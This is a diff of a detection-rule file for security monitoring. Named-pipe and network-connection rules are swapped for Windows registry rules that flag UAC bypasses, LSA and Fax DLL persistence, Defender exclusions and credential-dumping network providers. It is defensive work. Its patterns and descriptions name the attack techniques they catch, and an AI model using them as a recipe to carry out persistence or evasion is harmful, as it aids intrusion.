"Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing 
registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP 
'\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' 
AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "Alternate PowerShell Hosts Pipe", - "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", + "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "status": "experimental", + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + 
"attack.t1003" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter." + "Other legitimate network providers used and not filtred in this rule" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR NewProcessName LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (NewProcessName = '') OR (NewProcessName LIKE '%:\\\\Program Files%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" + "filename": "registry_set_new_network_provider.yml" }, { - "title": "Suspicious Network Connection Binary No CommandLine", - "id": "20384606-a124-4fec-acbb-8bd373728613", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_binary_no_cmdline.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "Wuauclt Network Connection", - "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "title": "New Application in AppCompat", + "id": "60936b49-fca0-4f32-993d-7415edcf9a5d", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Legitimate use of wuauclt.exe over the network." 
+ "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_wuauclt_network_connection.yml" + "filename": "registry_set_new_application_appcompat.yml" }, { - "title": "Remote PowerShell Session (Network)", - "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", - "status": "test", - "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - 
"attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", - "Network Service user name of a not-covered localization" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_remote_powershell_session_network.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "HH.EXE Network Connections", - "id": "468a8cea-2920-4909-a593-0cbe1d96674a", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", + "description": "Detects modification to the \"Default\" value of the 
\"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + ], + "filename": "registry_set_persistence_mycomputer.yml" + }, + { + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_hh.yml" + "filename": 
"registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "Suspicious Outbound SMTP Connections", - "id": "9976fa64-2804-423c-8a5b-646ade840773", - "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "author": "frack113", + "title": "Windows Defender Exclusions Added - Registry", + "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", + "status": "test", + "description": "Detects the Setting of Windows Defender Exclusions", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Other SMTP tools" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', '2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_smtp_connections.yml" + "filename": "registry_set_defender_exclusions.yml" }, { - "title": "Download a File with IMEWDBLD.exe", - "id": "8d7e392e-9b28-49e1-831d-5949c6281228", - "status": "test", - "description": "Use IMEWDBLD.exe (built-in to windows) to 
download a file", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "author": "frack113", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "net_connection_win_imewdbld.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Cmstp Making Network Connection", - "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", + "title": "Potential Registry Persistence Attempt Via DbgManagedDebugger", + "id": "9827ae57-3802-418f-994b-d5ecf5cd974b", "status": "experimental", - "description": "Detects suspicious network connection by Cmstp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.persistence", + "attack.t1574" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\.NETFramework\\\\DbgManagedDebugger' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\Windows\\\\system32\\\\vsjitdebugger.exe\" PID \\%d APPDOM \\%d EXTEXT \"\\%s\" EVTHDL \\%d' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_cmstp.yml" + "filename": "registry_set_dbgmanageddebugger_persistence.yml" }, { - "title": "Msiexec Initiated Connection", - "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", - "status": "test", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "title": "Modification of IE Registry Settings", + "id": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", + "status": "experimental", + "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. 
